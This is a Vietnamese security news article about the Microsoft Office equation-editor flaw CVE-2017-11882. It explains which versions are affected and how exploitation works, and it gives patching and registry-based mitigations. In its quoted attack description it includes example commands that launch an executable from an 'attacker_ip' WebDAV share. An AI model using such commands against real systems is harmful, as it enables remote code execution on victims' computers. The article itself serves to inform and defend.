Các nhà nghiên cứu bảo mật đã phát hiện ra một lỗ hổng mới trên phần mềm Microsoft Office mà qua đó các hacker có thể từ xa bí m

Các nhà nghiên cứu bảo mật đã phát hiện ra một lỗ hổng mới trên phần mềm Microsoft Office mà qua đó các hacker có thể từ xa bí mật cài mã độc vào máy tính.

Đây là một lỗ hổng có có khả năng phá huỷ bộ nhớ dữ liệu của máy. Thông thường một lỗ hổng bảo mật chỉ nằm trong một số phiên bản hoặc chỉ có thể được khai thác ở một số hệ điều hành nhất định. Thật không may, lỗ hổng lần này lại có mặt trong tất cả các phiên bản mà Microsoft Office đã phát hành trong suốt 17 năm qua, kể cả Microsoft Office 365 và hoạt động được trên tất cả các phiên bản hệ điều hành Windows, bao gồm bản cập nhật mới nhất của Microsoft Windows 10 Creators Update.

Được phát hiện bởi các nhà nghiên cứu bảo mật tại Embedi, lỗ hổng CVE-2017-11882 nằm trong EQNEDT32.EXE, một thành phần của MS Office chịu trách nhiệm chèn và chỉnh sửa các phương trình toán học (các đối tượng OLE). Tuy nhiên, do một số trục trặc trong hoạt động của bộ nhớ, thành phần này không xử lý đúng các đối tượng này, gây ra lỗ hổng từ đó mở đường cho các hacker thực thi mã độc trong tài khoản người dùng đã đăng nhập sẵn mà không để lại bất cứ thông báo gì khi nạn nhân mở tập tin bị nhiễm độc.

Cách đây 17 năm, EQNEDT32.EXE được giới thiệu trong Microsoft Office 2000 và được tiếp tục sử dụng trong tất cả các phiên bản được phát hành sau Microsoft Office 2007 để đảm bảo phần mềm vẫn tương thích với các tài liệu của các phiên bản cũ hơn.

Hacker muốn khai thác lỗ hổng này cần nạn nhân phải mở tập tin độc hại được thiết kế đặc biệt qua phiên bản bị nhiễm độc của Microsoft Office hoặc phần mềm Microsoft WordPad.

Lỗ hổng này có thể bị khai thác để kiểm soát toàn hệ thống khi được kết hợp với các lỗ hổng leo thang đặc quyền trên Windows Kernel (như CVE-2017-11847).

Mã độc này có thể tấn công bằng những cách sau:

"Bằng cách chèn nhiều OLE đã bị phơi nhiễm bởi lỗ hổng, một đoạn mã sẽ được gửi đến người dùng để thực thi một chuỗi các mệnh lệnh (ví dụ, để tải một tập tin bất kì từ Internet và thông qua đó hacker sẽ có được toàn quyền kiểm soát máy tính khi tập tin được tải về và mở ra)."

"Một trong những cách đơn giản nhất để thực thi mã lệnh là khởi chạy một tệp thực thi từ máy chủ WebDAV do kẻ tấn công kiểm soát."

“Tuy nhiên, kẻ tấn công còn có thể sử dụng lỗ hổng trên để thực thi những lệnh như cmd.exe /c start \\attacker_ip\ff. Những mã lệnh này có thể được sử dụng như một phần của chương trình khai thác lỗ hổng (exploit) và tự ý khởi động WebClient.”

“Sau đó, kẻ tấn công có thể dùng lệnh \\attacker_ip\ff\1.exe kích hoạt một tệp thực thi từ server WebDAV. Cơ chế khởi động của tệp này tương tự với cơ chế khởi động của \\live.sysinternals.com\tools service.

Một số cách để bảo vệ máy tính khỏi lỗ hổng Microsoft Office.

• Nhanh chóng tải về phiên bản vá lỗi bảo mật mới nhất mà Microsoft vừa phát hành trong tháng 11.
• Vô hiệu hoá thành phần OLE của phần mềm Microsoft Office nếu có thể vì đây là thành phần mang nhiều vấn đề bảo mật dễ gây hại cho máy tính. Người dùng có thể chạy lệnh sau để vô hiệu hoá thành phần này trong bộ nhớ Windows:

reg add "HKLM\SOFTWARE\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400

Đối với Microsoft Office 32-bit hoạt động trên hệ điều hành x64 OS, chạy lệnh sau:

reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400

• Bên cạnh đó, người dùng cũng nên mở tính năng Protected View (Microsoft Office sandbox) để tránh các mã thực thi ẩn (OLE/ActiveX/Macro).